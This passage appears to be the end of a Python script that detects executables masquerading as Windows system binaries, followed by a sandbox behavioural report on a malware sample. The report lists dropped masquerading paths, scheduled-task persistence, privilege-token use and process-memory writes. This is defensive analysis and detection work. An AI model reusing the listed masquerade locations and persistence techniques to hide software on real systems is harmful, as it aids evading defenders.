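HEX_COMPANION = re.compile(r"^[0-9a-f]{14}$")

# Paths copied from the "Drops file ..." and "Executes dropped EXE" tables.
DROPPED = [
    r"C:\Program Files\ModifiableWindowsApps\sihost.exe",
    r"C:\Program Files\Java\jre-1.8\winlogon.exe",
    r"C:\Program Files (x86)\MSBuild\winlogon.exe",
    r"C:\Program Files (x86)\MSBuild\cc11b995f2a76d",
    r"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe",
    r"C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\conhost.exe",
    r"C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\088424020bedd6",
    r"C:\Windows\it-IT\msedge.exe",
    r"C:\Windows\it-IT\61a52ddc9dd915",
    r"C:\Windows\InputMethod\SHARED\conhost.exe",
    r"C:\Windows\diagnostics\system\IESecurity\msedge.exe",
    r"C:\Windows\Performance\WinSAT\DataStore\SearchApp.exe",
    r"C:\Recovery\WindowsRE\SppExtComObj.exe",
    # control: the genuine Edge binary the sandbox also recorded running
    r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
]


def _split(path):
    """Return (parent_dir, file_name), lower-cased, with the drive letter stripped."""
    p = PureWindowsPath(path)
    parent = str(p.parent).lower()
    if len(parent) >= 3 and parent[1:3] == ":\\":
        parent = parent[3:]
    return parent, p.name.lower()


def is_masquerading(path):
    """True when the name is a known system binary but the directory is not canonical."""
    parent, name = _split(path)
    expected = CANONICAL.get(name)
    return expected is not None and parent not in expected


def find_masquerades(paths):
    """Subset of paths that masquerade as system binaries, in input order."""
    return [p for p in paths if is_masquerading(p)]


def companion_dirs(paths):
    """Directories that hold a hex-named companion file next to a masqueraded binary."""
    dirs_with_masq = {_split(p)[0] for p in find_masquerades(paths)}
    found = set()
    for p in paths:
        parent, name = _split(p)
        if HEX_COMPANION.match(name) and parent in dirs_with_masq:
            found.add(parent)
    return sorted(found)


if __name__ == "__main__":
    for hit in find_masquerades(DROPPED):
        print("masquerade:", hit)
    for d in companion_dirs(DROPPED):
        print("hex companion beside masquerade in:", d)
```

On a live host the same logic applies to a directory walk rather than a fixed list; the name-plus-location check is cheap and, unlike a hash match, still fires when the dropper is rebuilt. Note that the genuine Edge binary passes because its directory is in the canonical set, which is why the control line is included.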

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1705699165-553239100-4129523827-1000\{03B65D90-6E45-4BD2-9E62-6DFEC28F04A9} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
N/A N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
N/A N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
N/A N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
N/A N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
N/A N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
N/A N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
N/A N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\ja-JP\msedge.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1356 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
PID 1356 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
PID 1356 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
PID 1356 wrote to memory of 4032 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 1356 wrote to memory of 4032 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 1356 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 1356 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 1356 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 1356 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 4608 wrote to memory of 1948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 4608 wrote to memory of 1948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 872 wrote to memory of 704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 4408 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 4408 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 5116 wrote to memory of 396 N/A C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe C:\Windows\SysWOW64\WScript.exe
PID 5116 wrote to memory of 396 N/A C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe C:\Windows\SysWOW64\WScript.exe
PID 5116 wrote to memory of 396 N/A C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe C:\Windows\SysWOW64\WScript.exe
PID 872 wrote to memory of 1172 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 1172 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 1104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 1104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 1508 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 1508 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 3920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 3920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 4984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 4984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 1276 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 1276 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 5072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 5072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 1652 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 1652 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 5108 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 5108 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 2284 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 2284 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 2280 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 2280 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 2952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 2952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 1100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 1100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 3936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
